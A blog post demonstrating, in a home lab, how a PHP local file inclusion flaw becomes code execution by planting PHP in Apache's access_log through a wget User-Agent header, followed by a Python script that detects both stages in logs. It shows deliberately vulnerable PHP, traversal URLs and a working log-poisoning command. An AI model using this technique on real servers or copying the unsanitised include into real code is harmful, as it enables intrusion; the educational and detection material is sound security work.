Wednesday, January 6, 2010

Local File Include Code Execution

Based on http://eng.xakep.ru/link/50643/, I created a demo app to play with this. The vulnerable PHP code looks like:

<?php

// Vulnerable on purpose: the id parameter is used as a file path with no
// validation, so any file the web server user can read may be included.
$file = $_GET['id'];
echo $file;

if (file_exists($file))
    include $file;

?>

The following URL demonstrates a local file include (the four ../ segments walk from the web root up to /):

http://192.168.1.102/animals/animals.php?id=../../../../etc/passwd

An attacker controls several fields of the web server log entries his own requests generate, because Apache writes request headers such as User-Agent and Referer into access_log verbatim. For example, the -U flag to wget sets a custom User-Agent header:

wget -U "<?php system('touch /tmp/dennis'); ?>" 192.168.1.102

That request generates the following Apache access_log entry, with the PHP snippet stored unmodified in the User-Agent field:

192.168.1.102 - - [06/Jan/2010:20:15:04 -0600] "GET / HTTP/1.0" 200 2212 "-" "<?php system('touch /tmp/dennis'); ?>"

If we request the following URL:

http://192.168.1.102/animals/animals.php?id=../../../../var/www/logs/access_log *

* the path to Apache's access_log varies per configuration.

animals.php's include statement pulls in access_log, and PHP parses it like any other included file: the ordinary log text is emitted as output, but the User-Agent of the poisoned entry is a <?php ... ?> block, so it is executed with the privileges of the web server user. This only works when that user can read access_log, which is not the case on every installation. The file created by the planted command is owned by the web server user:

dennis@ipa:~$ ls -l /tmp/dennis
-rw-r--r-- 1 www wheel 0 Jan 6 20:26 /tmp/dennis
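Both halves of the attack leave traces in the same access_log: the poisoning request carries a PHP open tag in a logged header, and the include request carries a traversal string in the id parameter pointing at the log file. The following detection script is an added example, not code from the original post; it parses Apache combined-format lines and tags both stages. The first sample line is the poisoned entry shown above, the remaining lines are constructed for this example, and the list of include targets is an assumption, not something the post enumerates.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" log format (the format of the post's access_log line):
# host ident authuser [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A PHP open tag in a logged header is the signature of log poisoning: the
# header is inert until a later include makes PHP parse the log file.
PHP_TAG_RE = re.compile(r'<\?(php\b|=)', re.IGNORECASE)

# "../" after one round of URL-decoding; a double-encoded %252e still shows up
# as %2e%2e%2f after parse_qsl decodes it once, so match both forms.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|%2e%2e(%2f|/))', re.IGNORECASE)

# Files an attacker includes once they contain planted PHP. Assumed list for
# this example, not taken from the original post.
INCLUDE_TARGETS = ('access_log', 'access.log', 'error_log', 'error.log', '/proc/self/environ')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line.rstrip('\n'))
    return m.groupdict() if m else None


def classify(entry):
    """Return finding tags for one parsed entry (empty list means nothing suspicious)."""
    findings = []
    # Stage 1, poisoning: planted PHP in the fields Apache writes verbatim.
    for field in ('agent', 'referer'):
        if PHP_TAG_RE.search(entry[field]):
            findings.append('php-tag-in-' + field)
    # Stage 2, the include: traversal in a query value, especially toward a log file.
    parts = entry['request'].split(' ')
    target = parts[1] if len(parts) >= 2 else ''
    query = target.partition('?')[2]
    for key, value in parse_qsl(query, keep_blank_values=True):
        if TRAVERSAL_RE.search(value):
            findings.append('traversal-in-' + key)
            if value.lower().endswith(INCLUDE_TARGETS):
                findings.append('log-include-in-' + key)
    return findings


def scan(lines):
    """Return (host, request, findings) for every parseable line that has findings."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append((entry['host'], entry['request'], findings))
    return hits


# Sample log: the first line is the poisoned entry shown in the post; the rest
# are constructed for this example.
SAMPLE_LOG = [
    '192.168.1.102 - - [06/Jan/2010:20:15:04 -0600] "GET / HTTP/1.0" 200 2212 "-" '
    '"<?php system(\'touch /tmp/dennis\'); ?>"',
    '192.168.1.102 - - [06/Jan/2010:20:26:02 -0600] '
    '"GET /animals/animals.php?id=../../../../var/www/logs/access_log HTTP/1.0" 200 4096 "-" "Wget/1.12"',
    '192.168.1.102 - - [06/Jan/2010:20:27:15 -0600] '
    '"GET /animals/animals.php?id=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0" 200 1847 "-" "Wget/1.12"',
    '192.168.1.50 - - [06/Jan/2010:20:30:00 -0600] '
    '"GET /animals/animals.php?id=cat.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for host, request, findings in scan(SAMPLE_LOG):
        print(host, request, ', '.join(findings))
```

Run it against a real access_log with scan(open('/path/to/access_log')). The php-tag finding on its own only tells you someone tried to plant code; the traversal-plus-log-include finding on a later line from the same host is what indicates the include stage was attempted, so correlate the two by host rather than alerting on either alone.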
